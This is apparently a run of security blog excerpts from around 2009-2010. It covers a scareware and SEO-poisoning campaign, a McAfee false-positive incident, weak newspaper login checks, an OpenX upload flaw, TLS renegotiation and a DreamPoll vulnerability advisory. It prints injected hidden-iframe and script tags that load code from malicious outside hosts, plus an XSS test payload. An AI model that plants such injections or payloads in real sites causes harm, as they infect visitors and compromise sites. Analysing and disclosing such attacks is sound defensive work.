If you have used the web for any length of time at all, it is quite likely that you have seen a pop-up box similar to the one above on your computer when visiting a web site.  In the security industry this type of malware is frequently referred to as scareware or rogue anti-virus.  When confronted with this message, many people will unsuspectingly click the “OK” button which will usually install some type of malware that claims your machine is infected with a virus.  It then offers to remove the virus if you purchase a product.  The problem is, not only is this not going to protect your machine, but will likely lead to further system compromise and possibly the loss of personally identifiable information or credit card data.

A client of mine recently called to inform me that his system had been infected with malware after clicking the “OK” button on the above pop-up box.  After removing the malware from his machine, I decided to dig further into this scareware campaign.  The client reported that he performed a search for “tatiana banx” and one of the top 10 results took him to this site.

I started my analysis by performing the same search as my client.  The results of my search are shown below.  Notice the 10th result which I have highlighted with a red arrow.

The URL is hxxp://collin-county-real-estate.rmdfw.com/gsfyn/yuxfm.php?gu=500242.  Also notice all the keywords listed for “tatiana”.  This one caught my attention and sure enough, clicking on this link will take you to a rogue AV site.  Moreover, your browser will become unusable except to click the “OK” button.  In fact, if you click on any part of the pop-up box the malware will be installed, indicating that clickjacking is part of this attack as well.  The only way to prevent infection after clicking on the link in the search result is to kill the browser process. Clicking on any part of the pop-up box results in infection.

So, the first part of this scareware campaign is the use of SEO poisoning to generate high search results for the term “tatiana banx” among others.  This is a common technique used by scammers to increase traffic to their sites and to increase infection rates.  But how did they do this?  I began by investigating the collin-county-real-estate.rmdfw.com site.  This site is the Dallas-Fort Worth Re/Max Realtor web site.  The A record for this server is 216.177.141.4 with a PTR of web17.websitesource.net.  Thus, it appears that this site is hosted at WebSiteSource with a location somewhere in Kansas if the geoIP information is accurate.   Next I examined the web server itself and found that directory listing was enabled which led to a treasure trove of interesting information.

This is only a partial list of over 330 files on this server that appear to be part of an SEO poisoning campaign.  Examination of these files indicates that this server is being used to manipulate search results for many, many different search terms.  For example, the search I performed for “tatiana banx” brought the result hxxp://collin-county-real-estate.rmdfw.com/gsfyn/yuxfm.php?gu=500242.  A partial listing of the contents of the file 500242 is listed below:

<a href=hxxp://collin-county-real-estate.rmdfw.com>collin-county-real-estate.rmd
fw.com</a><p> tatiana milovani </p>
<p> shte eet glawa ivanova tatiana che </p>
<p> eest ivanova tatiana dean electrical </p>
<p> tatiana narvaez </p>
<p> life info on tatiana golovin </p>
<p> tatiana isotov </p>
<p> mary tatiana krot </p>
<p> tatiana fistrovic and us visa </p>
<p> tatiana gregorieva </p>
<p> tatiana keeshan </p>
<p> tatiana petit </p>
<p> tatiana scam </p>
<p> tatiana startseva parkville </p>
<p> chris tatiana </p>
<p> tatiana free pics </p>
<p> tatiana nikolaevna tumanova </p>
<p> tatiana ali in king mag </p>
<p> tatiana jones </p>
<p> tatiana petersen </p>
<p> find tatiana schwappach </p>
<p> tatiana alverez </p>

Other files on this server show similar content for different search terms.  It appears that this server is being used as part of an SEO poisoning campaign, likely without the knowledge of the web site’s owner.  Furthermore, assuming that the owners of the rmdfw.com domain are not purposely redirecting traffic to malware distribution sites, it is likely that this server has been compromised.

The next step in my analysis involves an examination of the method that the site uses for redirecting traffic from hxxp://collin-county-real-estate.rmdfw.com to another site that attempts to install malware on the visitor’s machine.  This turns out to be the most interesting part.  There is a PHP script (yuxfm.php) that redirects to various other sites that host the scareware campaign.  You will only be redirected if you click on the URL from a search result, indicating that the referer is being used to determine how traffic will be handled.  Using a proxy to capture all of the communication between my system and the servers involved, I was able to reconstruct the sequence of events.  After performing a search and clicking on the URL hxxp://collin-county-real-estate.rmdfw.com/gsfyn/yuxfm.php?gu=500242 which was the 10th result presented, the server responds with a 302 redirect to one of several different URLs.  Below is the original request:

GET http://collin-county-real-estate.rmdfw.com/gsyfn/yuxfm.php?gu=500242 HTTP/1.1
Host: collin-county-real-estate.rmdfw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB7.1 (.NET CLR 3.5.30729) Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=&q=tatiana+banx&sourceid=navclient-ff&rlz=1B3GGGL_enUS340US341&ie=UTF-8
Cookie: Hello-friend=4

And the response:

HTTP/1.1 302 Found
Date: Tue, 27 Jul 2010 02:37:50 GMT
Server: Apache
Set-Cookie: Hello-friend=5
Location: hxxp://zeoro1.strangled.net/3/?c=947
Content-Type: text/html

In this case I was redirected to hxxp://zeoro1.strangled.net/3/?c=947.  This server then presents the scareware that attempts to trick the visitor into installing malware.  Notice the javascript that gets executed on the client.  No doubt this is the source of the malware.  The site also includes images that resemble actual Windows warning messages in order to increase the likelihood that the visitor will be fooled into accepting the malware:

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<link href=”style.css” rel=”stylesheet” type=”text/css” />
<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />
<meta http-equiv=”Content-Language” content=”en” />
<meta http-equiv=”Cache-control” content=”Public” />
<title>Online Protection</title>
<link rel=”icon” href=”images/favicon.ico” type=”image/x-icon” />

<link rel=”shortcut icon” href=”images/favicon.ico” type=”image/x-icon” />

<script type=”text/javascript” src=”4c4e43dde34f8.js?c=947″></script>
</head>
<body>
<div id=”loading” style=”display:block”>
<div>
<img height=”50″ width=”50″ style=”margin-right: 8px; float: left; vertical-align: top;” src=”images/loading.gif”/>
<br/>

<span id=”loadspan”>Initializing Virus Protection System…</span>
</div>
</div>
</body>
</html>

The redirected URL changes frequently in an attempt to make detection and investigation more difficult.  In fact, since I started my analysis a week ago, the  collin-county-real-estate.rmdfw.com URL no longer shows up when searching for “tatiana banx” and no longer appears to be used in this malware campaign.  However, other top 10 search results for “tatiana banx” result in the same scareware tactics.  For example, today hxxp://tmsoftwaresolutions.co.uk/linmx/plol.php?gi=438195 shows up as the number 6 result.  It is also important to keep in mind that this type of attack is not confined to only searches for “tatiana banx”.  It is clear that whoever is behind this attack is targeting many different search terms and thus all search results should be viewed with care.  Also, it appears that there are many compromised servers that are part of this campaign leading to the conclusion that this is not an isolated case.

To summarize, this scareware campaign makes use of a variety of techniques in order to spread its malware.  First, it uses compromised hosts to manipulate search results and drive traffic to its servers, a technique called SEO poisoning.  When a visitor clicks on one of these bogus search results, they are then redirected to a the malware delivery host which serves up content designed to make the visitor think their machine is infected with a virus.  If the visitor clicks on the pop-up box to try and “remove” the virus, they will actually be installing malware on their machine.  This malware pretends to be an anti-virus program, but in fact is malicious software.  In the the near future I will be conducting further analysis on the hosts involved, how they may have been compromised and used as part of this malware distribution campaign, and the nature of the malware itself.



Recently a Minnesota man was charged with aggravated identity theft and threatening the vice president after allegedly tapping into a neighbor’s wireless network and sending threatening email messages to US Vice President Joe Biden.   With a long history of having disputes with neighbors, he also allegedly stole personal information, sent offensive email messages, and emailed indecent photographs to his neighbor’s co-workers from an email account set up to appear as if the messages were coming from the neighbor.

While this may be an extreme case, this situation does show why it is so important for home users to take the time to secure their wifi networks using WPA/WPA2 encryption.  There are no systematic studies of security on home wifi networks that I am aware of, but some researchers have found that upwards of 65% of wireless networks tested are open.  Given how easy it is to configure encryption on wifi networks, there is no reason not to do it.  This is especially true if you live in a high population density area such as an apartment complex where easily dozens of other people could piggy back on an open wireless network.  Someone could use an open network to send spam, launch attacks against you or others, gather your personal data, or commit other illegal acts such as downloading pirated software or illegal copies of music.

Bruce Schneier, a well known information security researcher, has famously talked about his open home wifi network.  He cites the following reasons for not securing his network:

• Providing internet access to guests is kind of like providing heat and electricity, or a hot cup of tea.
• Any potential spammer is far more likely to sit in a warm room with a cup of coffee at a coffee shop than in a cold car outside a house.
• If you configure your computer to be secure regardless of the network it’s on, then it simply doesn’t matter.
• Sharing Internet access is a polite thing to do and he likes to return the favor as he often uses open wifi networks when traveling.

While some of these arguments are legitimate, it still seems to me that from a risk analysis standpoint, it makes more sense to secure a wireless network than not, especially if you live in a densely populated area.  It only takes a couple of minutes to turn on WPA or WPA2 encryption, so there is very little cost to doing so.  But the benefits of enabling this security are quite high.  It significantly raises the amount of work a would-be attacker or scammer would have to undertake to abuse your wifi network.  In all likelihood, unless you were specifically being targeted, he would simply move on to a more easily accessible network.  So use the built-in security provided by wifi access points.  It is easy to configure and can help prevent you from being woken up in the middle of the night by the FBI.

The file C:WINDOWS\system32\svchost.exe contains the W32/Wecorl.a Virus.
Undetermined clean error, OAS denied access and continued.
Detected using Scan engine version 5400.1158 DAT version 5958.0000.

My first reaction was that we were suffering a worm outbreak.  However, after a couple of minutes it became clear that this was not malware, but badware.  The 5958 DAT released by McAfee today incorrectly detected the svchost.exe file on Windows systems as a virus and then proceeded to delete/quarantine it.  We took several actions immediately:

• We added an exclusion for the svchost.exe file and pushed it out to all PCs
• We deleted the 5958 DAT from the ePO software repository
• We stopped the automated download of DAT files from McAfee
• We disabled the automatic push of DAT files to client machines

The svchost.exe file is very important for the proper operation of Windows and PCs cannot function properly without it.  Luckily, we only had a handful of systems that were impacted before we could prevent further damage.  Repairing the problem required physically visiting each system with a USB thumb drive to replace the deleted file.  Being a small company, this was not a huge issue for us.  However, large enterprises have been severely impacted with losses mounting as IT staff physically go to each machine to undo the damage.

McAfee VirusScan is one of the most widely used anti-virus products in the world.  This is not because it is particularly good at malware detection and removal, but because of its superior management tools.  I have used McAfee products for many years and can attest that this is not the first time McAfee has had such an incident.  In fact, just a few months ago we had to update the code on our web sites because McAfee VirusScan falsely alerted our visitors that we had malware on our site.  Below is a list of links documenting recent instances of false positive detections from McAfee:

• http://www.theregister.co.uk/2009/09/04/mcafee_false_positive
• http://www.theregister.co.uk/2009/07/03/mcafee_false_positive_glitch
• http://www.theregister.co.uk/2008/10/21/mcafee_vista_trojan_false_alert
• http://www.theregister.co.uk/2008/08/06/mcafee_live_update_false_alert

This list only covers the last couple of years and only the major false positives that caused enough problems to be reported.  I for one am getting tired of dealing with these incidents.  I expect more from a major security vendor such as McAfee.  Given the number of issues they have had over the years, it is clear that they need to improve their QA processes.  Right now I am more concerned about the next update from McAfee than I am about a malware infection.  And that is not a good thing for McAfee as I will definitely be evaluating other vendors when it comes time to renew our subscription.

The crux of the problem is that the web site relies on publicly available information to authenticate subscribers.  Below is a screenshot of the subscriber login screen.

As you can see, all that is required to login to a subscriber account is a phone number and house number.  Both of these pieces of information are easily obtained online for most people.  After authentication, you have access to the subscriber’s account where you can gain additional information about the them.  The most important information that you can get access to is the subscriber’s email address.  This would be useful to scammers who could setup a fake site that resembles the real newsandobserver.com, send the subscriber an email telling them that they need to update their account information, and then obtain their credit card or other financial account data.  Below is a screenshot of my account home page.

Another thing that you can do within the subscriber section is manipulate delivery options.  For example, you can put stops on delivery or extend your subscription.  This would allow an unauthorized person to put a hold on someone else’s paper delivery or even change the length of their subscription, both of which could have a financial impact on the subscriber.  Below is a screenshot showing the ability to change these options.

Lastly, subscribers are able to change their personal information such as email address and phone number.  There is also a check-box to disable email notification of account changes.  A scammer could use this option to prevent notifications from being sent to the subscriber after he made changes to the account.  By updating the email address and phone number to one of his choosing, he may even be able to use social engineering to obtain credit card information from an N&O customer service representative.  Below is a screenshot of the page that allows a subscriber to change personal information.

Such a weak authentication mechanism is inexcusable for the second largest newspaper in the state of North Carolina.  With over 750,000 print and online readers, there are many opportunities for scammers to use this weakness to obtain subscribers’ personally identifiable information and potentially additional financial information.  It would not be difficult to automate a process for gathering phone numbers and house numbers for prominent people in North Carolina, many of whom are likely to subscribe to the News and Observer, attempt to login as these individuals, and obtain their email addresses.  With such a list in hand, it would be possible to send them fake emails appearing to be from the N&O that could trick them into divulging their credit card numbers.

I have contacted the NewsandObserver.com to report this vulnerability to them.  Remediation is not difficult.  There are many types of authentication mechanisms that work well and the OWASP has a great site dedicated to this topic.  I hope that they take advantage of it to correct this issue.

The conversation usually goes something like this:

Me:  “Hey, have you heard about that new phishing attack targeting Bank of America customers?”

Mac User:  “Oh, I’m not worried about that.  I use a Mac.”

Me: “Well you know, just because you use a Mac doesn’t mean you are safe from an attack.”

Mac User: “Ha.  Everyone knows that Macs are waaaay more secure than Windows systems.”

If I had a nickel for every time I have heard a Mac user make some type of statement to this effect, I would not have to buy any more lottery tickets.  There is a widespread belief that Mac OS X is inherently more secure than Windows and that by using a Mac, one is protected from all threats.  Unfortunately, not only is this not true, but it is dangerous as it leads people to not take appropriate precautions to protect their computers and information.

Let’s start with some basic facts.  I performed a search of the NIST national vulnerability database and found the below data regarding Windows and OS X vulnerabilities:

These numbers represent the total number of vulnerabilities published for each of the last 3 years for Mac OS X (all versions) and Microsoft Windows Vista (all versions).  It is clear that OS X has had more total vulnerabilities in the last 3 years than Vista has.  These vulnerabilities provide potential avenues of attack for hackers which can lead to system compromise and data disclosure.

But that is only the tip of the iceberg.  Phishing scams, trojans, drive by downloads and other threats don’t depend on any vulnerability in software in order to be successful.  The weakness they exploit is in the user of the computer.  It doesn’t matter whether you use a Mac, a PC, a Next, or a Cray.  If you fall victim to one of these types of attacks that relies on social engineering to get users to divulge their credentials or install malware, using a Mac doesn’t offer you any protection at all.

Given the fact that Mac OS X has plenty of vulnerabilities, it might seem surprising that there is not more malware in the wild that exploits these weaknesses.  I believe the answer to this riddle can be found in the relative percentage of Windows to Mac users.  Most studies have found that Apple has between 7% – 12% market penetration, while Microsoft maintains nearly 85% market share.  If you are a hacker hoping to exploit vulnerabilities, it clearly makes more sense to devote your time and resources to the Windows platform since your odds of success will be much higher.  However, as the percentage of Mac OS X users grows, the number of exploits that target OS X will also grow.  So Mac users take note.  Do not be lulled into a false sense of security.  Be sure to follow best practices for protecting your computer and your data in order to minimize the risk of a successful attack.

<iframe src=”hxxp://thingre.com/in.php” width=”1″ height=”1″ style=”visibility:hidden;position:absolute”></iframe>

Anyone who accessed this site while the malicious code was active could potentially have had their computer infected with malware.  Fox Sports administrators eventually removed the iframe, but today the same page was infected again.  This time the below two script tags were injected:

<script src=hxxp://akcworld.com/genco/fusion-request-a-password.php ></script><body topmargin=”0″ leftmargin=”0″ marginheight=”0″ marginwidth=”0″>

and

<script src=’hxxp://nt002.cn/E/J.JS’></script>

These same two scripts were also used in the October Fox Sports web site compromise incident.  The akcworld.com  and nt002.cn domains are widely known to host malicious content and are frequently used as part of the Gumblar campaign.  At approximately 9:50pm I checked the Fox Sports web site to verify if the page was still infected.  It was not.  I then checked the page information and saw that it had been modified at 9:39pm EST, just 10 minutes before I checked the site.



The Fox Sports administrators moved very quickly this time to rectify the site compared to the October incident which nearly two weeks to address.  However, this situation obviously begs the question how the Fox Sports web site keeps being compromised.  I can think of several possibilities that would explain how this could occur:  1)  The hackers installed a backdoor that they continue to use for access 2) The hackers continue to use compromised credentials to the web site 3) A vulnerability exists in the web site that has not been remediated 4) Fox Sports administrators restored an older version of the page that included the malicious code from the October hack.  We won’t likely learn the root cause of this compromise any time soon, but it is certain that unless Fox Sports takes preventative action, it will probably occur again.

As troubling as this mistake was, what is even more troubling is the lack of recourse for affected students and parents.  North Carolina, like most states, has a data breach notification law which I have written about previously.  This law specifically prohibits sending post cards that contain personal information such as social security numbers.  See the relevant section of the law below:

Except as provided in subsections (c) and (d) of this section, no agency of the State or its political subdivisions, or any agent or employee of a government agency, shall do any of the following:

(9) Print an individual’s social security number on any materials that are mailed to the individual, unless state or federal law required that the social security number be on the document to be mailed. A social security number that is permitted to be mailed under this subdivision may not be printed, in whole or in part, on a postcard or other mailer not requiring an envelope, or visible on the envelope or without the envelope having been opened.

Like most state breach notification laws, the North Carolina law requires incidents such as this to be reported and for those affected to be contacted.  To their credit, the Wake County Public School System did disclose the error and has agreed to provide one year of free credit monitoring for affected families.  But they are not required to do so.  According to the statute, “No private right of action may be brought by an individual for a violation of this section unless such individual is injured as a result of the violation.”   Proving injury is next to impossible as there usually is no way to demonstrate the source of identity theft or credit fraud.  Moreover, these SSNs could be stored for years before being used fraudulently.  Affected students will need to monitor their credit closely for many years to come.  And if they do end up being victimized by the this egregious mistake, they have little legal recourse.

North Carolina’s breach notification law is similar to most states in that it requires businesses and other organizations to disclose breaches of personally identifiable information (PII).  And as with most other state laws of this type, penalties for violation are not very strong.  North Carolina’s law is one of the few that actually does allow an individual to sue in the event that injury is caused by the breach.  In actuality though, it is highly unlikely that any business will have to pay for injuries resulting from disclosure of PII.  Congress is currently debating a federal breach notification law that would apply to all U.S. business.  This is a step in the right direction and guarantees that any U.S. citizen whose PII has been disclosed will be notified.  But penalties for violation are still weak and until businesses are faced with financial penalties, disclosures will continue to be a problem.

OpenX adserver version 2.8.1 and lower is vulnerable to remote code execution. To be exploited, this vulnerability requires banner / file upload permissions, such as granted to the ‘advertiser’ and ‘administrator’ roles.

This vulnerability is caused by the (insecure) file upload mechanism of affected OpenX versions. These would check magic bytes of an uploaded file to determine its MIME type, and erroneously assume this information to be reliable. Additionally, while the file name of uploaded files is changed, the file extension is not.

As such, it is possible to upload image files with embedded PHP code and .php file extension. Unless PHP script execution is explicitly prevented for the file upload location (which has not been documented in the OpenX manual so far and it is not the result of a default installation), the PHP code will execute as soon as HTTP access to the file location will cause it to be executed by the web server.

To clarify, an attacker exploiting this security issue does require prior access to OpenX, i.e. exploitation is only possible after successful authentication. On the other hand, advertiser access is a rather low permission level and should not allow for system access.

If these bugs were not hidden from OpenX’ bug tracker, you could read up more about issue X-5747 here: https://developer.openx.org/jira/browse/OX/fixforversion/10910

OpenX 2.8.2 has already been released in October to fix this issue and can be downloaded from http://www.openx.org/ad-server/download

Credit goes to Moritz Naumann for disclosing this vulnerability.

Late last week it was disclosed by security researchers Marsh Ray and Steve Dispensa that a design flaw in TLS (the IETF implementation of SSL) could allow an attacker to successfully inject data in an encrypted session using a man-in-the-middle (MITM) attack.   The primary problem occurs during the renegotiation of the TLS channel when client certificates are employed.  Their paper documents the vulnerabilities in the TLS protocol as well as how the vulnerabilities could be exploited to violate the integrity of the data stream between a web client and server.  Even though the encrypted data cannot be read by the attacker, it is possible to inject arbitrary data into an authenticated session and it will be treated by the server as if it came from the client.  I will discuss the risks associated with this important discovery and outline some potential attack scenarios.

Putting the Risk Into Perspective

• As mentioned previously, this vulnerability primarily affects sessions in which client certs are in use.  The vast majority of secured TLS sessions today do not involve client certs which limits the impact of this vulnerability.  For example, if you are shopping online or connecting to your bank over the Internet, it is almost certainly the case that a client cert is not in use.  Where client certs are sometimes used is in enterprise applications such as external access to corporate email.  Some companies require the use of client certs in this scenario.  Also, TLS sessions between systems used as part of a web application (e.g. SOAP calls) sometimes utilize client certs for greater security.  However, for most users client side certs are a non-issue which limits the scope of this vulnerability.

• Another limiting factor of this vulnerability is the fact that it can only be exploited via a MITM attack.  MITM attacks are fairly difficult to successfully execute as it requires the interception of the network traffic between the client and the server.  While this is not impossible, it certainly would require some additional work.  In many cases, the hacking that would be necessary just to pull of the MITM attack would lead to greater potential rewards than the hacking of the TLS connection.  Some examples of MITM techniques include:

1. Compromising the network of either the client or the server (e.g. ARP poisoning)
2. Manipulating the DNS server of the client
3. Taking advantage of an unsecured WIFI network connected to either the client or the server
4. Using social engineering to compromise either the client or the server
5. Compromising a proxy server used by either the client or the server

• The results of an attack against this vulnerability do not allow the attacker to see any encrypted data sent by the client or the server.  It could allow an attacker to inject commands into the session which the server would believe came from the client and would execute.  However, the attacker would not be able to see the results which limits the impact of this vulnerability.  This situation clearly violates the integrity of the session, but the amount of damage that can be done is limited.

• This vulnerability does affect more than just HTTP.  This is the most common protocol to use TLS, but others do as well (e.g. IMAP).  The shear scope of applications and protocols that rely on it warrants a fix to ensure that developers and end users can be confident in the behavior and security of their applications.

Summary

The vulnerability in the TLS protocol disclosed on November 4, 2009 is not likely to lead to a great deal of exploitation.  The primary reasons are the difficulty required to successfully launch an attack and the limited nature of the vulnerability and the how it can be exploited.  Most attacks today are financially motivated and are conducted by groups that understand how to perform a cost benefit analysis.  I suspect that they will look at this vulnerability and decide that there are easier ways to exploit systems for monetary gain and it will not be worth their time to devote resources to develop exploits for this one.  The pay off is simply not high enough.  In sum, I believe the risk to most individuals and organizations is fairly low.  Fixes are already being rolled out, but given the extent to which TLS is used today, it will likely be many years before all applications and devices have been remediated.  Even still, I will be surprised if we read about any significant compromises in the future that are attributable to this vulnerability.

Sources for Additional Reading

http://www.educatedguesswork.org/2009/11/understanding_the_tls_renegoti.html

http://www.securityfocus.com/bid/36935/info

http://www.ietf.org/mail-archive/web/tls/current/msg03928.html

http://www.links.org/?p=780

During a recent security audit of the DreamPoll 3.1 software by Dreamlevels, I discovered a number of XSS and SQL Injection vulnerabilities in the application.  These vulnerabilities could be exploited to make unauthorized changes to a web site or compromise a client accessing a site that utilizes the application.  Details of the vulnerabilities are as follows:

XSS
————————-
File: index.php
Variable: recordsPerPage
Example: GET /index.php?action=login&sortField=poll_default&sortDesc=1&recordsPerPage=1>”><ScRiPt%20%0d%0a>alert(911)%3B</ScRiPt>